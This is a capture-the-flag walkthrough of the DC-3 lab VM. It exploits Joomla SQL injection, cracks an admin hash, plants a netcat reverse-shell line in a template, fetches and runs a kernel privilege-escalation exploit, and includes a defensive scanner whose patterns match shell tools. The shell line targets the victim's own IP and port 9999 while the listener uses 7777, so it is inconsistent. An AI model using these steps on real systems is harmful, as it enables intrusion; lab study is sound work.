Penetration Testing - DC_3
1. Fixing the VM that has no IP address
Here is what happened: after happily importing the OVA, I ran my own ARP scan script and it found nothing but my gateway and the like. Frustrated, I fell back on the "password reset" trick I had not used in ages. Of course it is not really a password reset here, just a way to edit the network configuration file...
First boot the VM and press the e key when the boot menu appears.
The following screen then shows up:
Find the line that starts with linux and ends with ro, and change ro to the text shown in the image below:
# What this line does:
rw single init=/bin/bash
Now you can log in as root in single-user mode. Next, edit the /etc/network/interfaces file. The cause of the problem is that the interface name in the configuration file differs from the name the system actually uses, so all that is needed is to change the interface name in the configuration file to the system's real interface name.
After editing, restart networking with /etc/init.d/networking restart
You can see that the VM now has an IP address.
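As an added example (not part of the original write-up), here is a small Python helper that parses an /etc/network/interfaces file, reports which configured interface names do not exist on the running system, and rewrites the stale name. The sample configuration and the interface set used in the test are constructed; on a real box you would pass the contents of /etc/network/interfaces and the names from /sys/class/net.

```python
import re
from pathlib import Path

# Constructed sample /etc/network/interfaces (not the DC-3 file itself)
SAMPLE_INTERFACES = """\
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp
"""


def configured_ifaces(config_text):
    """Interface names referenced by auto/allow-*/iface stanzas."""
    names = set()
    for line in config_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        words = line.split()
        if words[0] == "iface" and len(words) >= 2:
            names.add(words[1])
        elif words[0] == "auto" or words[0].startswith("allow-"):
            names.update(words[1:])
    return names


def system_ifaces():
    """Interfaces the running kernel actually has (same source `ip link` uses)."""
    return {p.name for p in Path("/sys/class/net").iterdir()}


def find_mismatch(config_text, present):
    """Return (configured names missing on the system, non-loopback system names)."""
    missing = sorted(configured_ifaces(config_text) - present)
    candidates = sorted(n for n in present if n != "lo")
    return missing, candidates


def rename_iface(config_text, old, new):
    """Rewrite one interface name, whole words only, so 'eth0' never touches 'eth01'."""
    return re.sub(r"\b%s\b" % re.escape(old), new, config_text)


if __name__ == "__main__":
    missing, candidates = find_mismatch(Path("/etc/network/interfaces").read_text(),
                                        system_ifaces())
    print("configured but absent:", missing, "| available:", candidates)
```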
2. Host discovery
Scan with the ARP scan script written earlier; the MAC column is omitted here.
[root@localhost Desktop]# python3 Arp_Scan.py 10.87.51.0/24
IP: 10.87.51.1
IP: 10.87.51.2
IP: 10.87.51.21
IP: 10.87.51.254
[+] 本次扫描共花费 1.706566333770752 秒
The IP address found is the same as the one seen before restarting the VM.
Scan it with Nmap:
root@kali:~# nmap -sV -p- 10.87.51.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 20:49 EDT
Nmap scan report for 10.87.51.21
Host is up (0.00076s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open ssl/http Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:63:0D:34 (VMware)
Service detection performed. Please report any incorrect re
Only port 80 is open. Visiting the site and viewing the page source shows it is running Joomla:
Joomla! - Open Source Content Management
So I ran Joomscan against it:
root@kali:~# joomscan -u http://10.87.51.21
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] admin finder
[++] Admin page : http://10.87.51.21/administrator/
# I have left out the less important output
3. Exploitation
A Google search shows that Joomla 3.7 has a SQL injection vulnerability, CVE-2017-8917, and there is a matching exploit on GitHub:
https://github.com/stefanlucas/Exploit-Joomla.git
root@kali:~# python joomblah.py http://10.87.51.21
[$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
Check the hash type with hashid:
root@kali:~# cat 1.txt | hashid
Analyzing '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
Crack it with john:
root@kali:~# john 1.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy (?)
1g 0:00:00:00 DONE 2/3 (2020-04-21 21:48) 3.846g/s 138.4p/s 138.4c/s 138.4C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# john 1.txt --show
?:snoopy
1 password hash cracked, 0 left
This gives the password snoopy. Log in with the account admin and edit the following site file:
http://10.87.51.21/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA
Add the following:
system('rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 10.87.51.21 9999 >/tmp/bd')
Catch the reverse shell:
root@kali:~/Desktop# nc -lnvp 7777
listening on [any] 7777 ...
connect to [10.87.51.17] from (UNKNOWN) [10.87.51.21] 57164
bash: cannot set terminal process group (1328): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html$
www-data@DC-3:/var/www/html$ pwd
pwd
/var/www/html
www-data@DC-3:/var/www/html$ whoami
whoami
www-data
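From the defender's side, the two things that made this foothold possible are an unpatched Joomla and a template file that a web user could edit to contain command execution. As an added example (not part of the original write-up), the Python below reads the version from Joomla's administrator/manifests/files/joomla.xml manifest, compares it with 3.7.1 (the release that fixed CVE-2017-8917), and scans a template's PHP source for exec-style calls and the mkfifo/netcat fragments seen above. The manifest and template strings in the test are constructed samples; ATTACKER_IP is a placeholder.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Joomla 3.7.1 fixed the com_fields SQL injection (CVE-2017-8917).
FIXED_VERSION = (3, 7, 1)

# Strings that have no business inside a template file; the shell planted
# through the template editor above would trip each of them.
EXEC_PATTERNS = [
    re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    re.compile(r"\bmkfifo\b"),
    re.compile(r"\b(nc|ncat|netcat)\b[^\n]*\d{1,5}"),  # netcat plus a port
]


def parse_version(manifest_xml):
    """Version tuple from the <version> element of joomla.xml."""
    root = ET.fromstring(manifest_xml)
    text = root.findtext("version") or ""
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])


def needs_patch(version):
    """True when the installed version predates the fix."""
    return version < FIXED_VERSION


def scan_template(php_source):
    """(line number, matched text) for every suspicious call in one PHP file."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for pat in EXEC_PATTERNS:
            m = pat.search(line)
            if m:
                hits.append((lineno, m.group(0)))
    return hits


def audit_site(site_root):
    """Walk a Joomla install: report patch status and every flagged template line."""
    root = Path(site_root)
    version = parse_version((root / "administrator/manifests/files/joomla.xml").read_text())
    findings = {}
    for php in (root / "templates").rglob("*.php"):
        hits = scan_template(php.read_text(errors="replace"))
        if hits:
            findings[str(php)] = hits
    return {"version": version, "needs_patch": needs_patch(version), "findings": findings}
```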
4. Privilege escalation
root@kali:~# searchsploit "linux Kernel 4.4.x (Ubuntu 16.04)"
--------------------------------------------------------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
--------------------------------------------------------------------------------------
Then the exploit-db entry at https://www.exploit-db.com/exploits/39772 gives a hint to download the code from https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Download exploit.tar onto the target machine:
www-data@DC-3:/tmp$ wget http://10.87.51.17/exploit_2.tar
wget http://10.87.51.17/exploit_2.tar
--2020-04-22 13:31:19-- http://10.87.51.17/exploit_2.tar
Connecting to 10.87.51.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit_2.tar'
0K .......... .......... 100% 75.2M=0s
2020-04-22 13:31:19 (75.2 MB/s) - 'exploit_2.tar' saved [20480/20480]
Then extract it:
www-data@DC-3:/tmp$ tar -xvf exploit_2.tar
tar -xvf exploit_2.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
Run the compile script:
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
# The warnings can be ignored; the new binaries have already been built at this point
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
exp
hello
hello.c
suidhelper
suidhelper.c
Then run the newly built doubleput binary to obtain root:
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -al
total 32
drwx------ 2 root root 4096 Mar 26 2019 .
drwxr-xr-x 22 root root 4096 Apr 22 04:26 ..
-rw------- 1 root root 67 Mar 26 2019 .bash_history
-rw-r--r-- 1 root root 3106 Oct 23 2015 .bashrc
-rw------- 1 root root 71 Mar 23 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw------- 1 root root 2889 Mar 26 2019 .viminfo
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!